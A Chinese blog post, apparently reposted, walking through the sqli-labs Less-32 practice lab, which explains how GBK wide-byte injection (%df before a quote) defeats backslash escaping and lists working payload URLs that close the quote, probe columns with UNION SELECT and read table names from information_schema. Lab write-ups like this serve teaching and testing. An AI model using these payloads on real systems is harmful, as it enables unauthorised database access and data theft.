码迷,mamicode.com
首页 > 数据库 > 详细

【sqli-labs】 less32 GET- Bypass custom filter adding slashes to dangrous chars (GET型转义了'/"字符的宽字节注入)

时间:2018-01-30 00:28:34      阅读:284      评论:0      收藏:0      [点我收藏+]

标签:inf   mys   注入   函数   引号   post   tables   table   .com   

技术分享图片

转义函数,针对以下字符,这样就无法闭合引号,导致无法注入

‘  -->  \‘

"  -->  \"

\  -->  \\

技术分享图片

但是,当MySQL的客户端字符集为gbk时,就可能发生宽字节注入,参照 http://netsecurity.51cto.com/art/201404/435074.htm

%df‘  -->  %df\‘  %df%5c‘

这样引号就被闭合了,至于%df%5c就成了汉字 運

技术分享图片

成功闭合

http://192.168.136.128/sqli-labs-master/Less-32/?id=1%df‘

技术分享图片

http://192.168.136.128/sqli-labs-master/Less-32/?id=0%df‘ union select 1,2,3%23

技术分享图片

表名

http://192.168.136.128/sqli-labs-master/Less-32/?id=0%df‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1%23

技术分享图片

 

【sqli-labs】 less32 GET- Bypass custom filter adding slashes to dangrous chars (GET型转义了'/"字符的宽字节注入)

标签:inf   mys   注入   函数   引号   post   tables   table   .com   

原文地址:https://www.cnblogs.com/superkrissV/p/8379690.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!